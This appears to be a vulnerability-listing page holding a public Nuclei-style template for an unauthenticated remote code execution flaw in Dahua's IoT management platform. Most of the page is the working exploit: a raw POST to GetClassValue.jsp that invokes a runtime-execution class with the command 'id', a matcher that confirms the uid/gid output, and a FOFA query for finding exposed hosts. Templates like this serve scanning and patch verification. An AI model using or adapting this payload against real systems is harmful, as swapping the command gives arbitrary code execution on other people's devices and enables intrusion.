dahua-icc-getclassvalue-rce: Dahua 'GetClassValue' - Remote Code Execution

Date: 2025-08-01 | Affected software: Dahua GetClassValue | PoC: public

Vulnerability description

Remote Code Execution Vulnerability in Dahua Intelligent IoT Integrated Management Platform via GetClassValue.jsp.

PoC code [public]

id: dahua-icc-getclassvalue-rce

info:
  name: Dahua 'GetClassValue' - Remote Code Execution
  author: ProjectDiscoveryAI
  severity: critical
  description: |
    Remote Code Execution Vulnerability in Dahua Intelligent IoT Integrated Management Platform via GetClassValue.jsp.
  reference:
    - https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dahua-icc-getclassvalue-rce.yaml
  metadata:
    fofa-query: app="dahua-智能物联综合管理平台"
    max-request: 1
  tags: rce,java,dahua,iot,unauth

http:
  - raw:
      - |
        POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "data": {
                "clazzName": "com.dahua.admin.util.RuntimeUtil",
                "methodName": "syncexecReturnInputStream",
                "fieldName": ["id"]
            }
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
# digest: 480a0045304302200a18d5a0816e0aa6bb6c812f532509137be15818ebbb106c4a70250b797e3ae5021f15f0e7344f4ead99705d02ee6bd3fc10fd04d5a8c45ac47fa3337e3512221b:922c64590222798bb761d5b6d8e72950